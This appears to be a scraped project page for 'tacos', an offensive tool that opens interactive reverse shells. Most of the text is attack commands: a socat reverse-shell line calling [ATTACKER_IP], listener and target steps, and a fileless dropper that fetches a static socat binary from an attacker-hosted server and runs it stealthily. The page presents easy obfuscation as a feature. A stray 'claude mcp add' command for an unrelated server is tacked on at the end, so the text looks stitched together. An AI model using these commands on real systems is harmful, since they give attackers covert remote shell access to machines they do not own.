Browse by type
(reverse socat)

Spawn a pty in your reverse shell to automaticaly make it interactive for socat listener.
Fast interactive reverse shell set-up 🐳 (container)
All credit goes to laluka idea
Equivalent of:
socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0
Why ?
* too lazy to copy/paste/learn socat command
* target doesn't have socat and you don't want to do this
* provide more advanced configuration to the tty (alias, etc)
* easier to obfuscate
* cross-platform (windows support is OK but not yet interactive. It is recommended to use non-docker solution for it)
* tired of hitting ^C and loosing your shell?
tacos is built to work with the simple and dramatically effective project pty4all:
# On attacker machine
tmux
./light-pty4all/socat-listener.sh --lhost [ATTACKER_IP] --lport [ATTACKER_PORT] #multi-handler
# On target (transfer tacos as you wish)
./tacos [ATTACKER_IP]:[ATTACKER_PORT] # or .\tacos.exe [ATTACKER_IP]:[ATTACKER_PORT] for windows
# 💥
Source aliases (for simplicity):
alias tacos.container='docker run --net host --rm -it ariary/tacos'
Launch multi-handler listener:
tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]
Notes about container security:
From a networking point of view, this is the same level of isolation as if the process were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.
curl -lO -L -s https://github.com/ariary/tacos/releases/latest/download/tacos && chmod +x tacos
need go:
git clone https://github.com/ariary/tacos.git && cd tacos
make before.build
make build.tacos # or make build.tacos.windows
Alternatively, if target does not have socat:
Host a static version of socat binary and download + execute it using the stealthy filess-xec dropper:
# On attacker machine
# get socat static & expose it
get-static socat
python3 -m http.server 8080
# On target machine
# Use already downloaded fileless-xec to download socat and stealthy launch it with argument
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:443,verify=0
$ claude mcp add tacos \
-- python -m otcore.mcp_server <graph>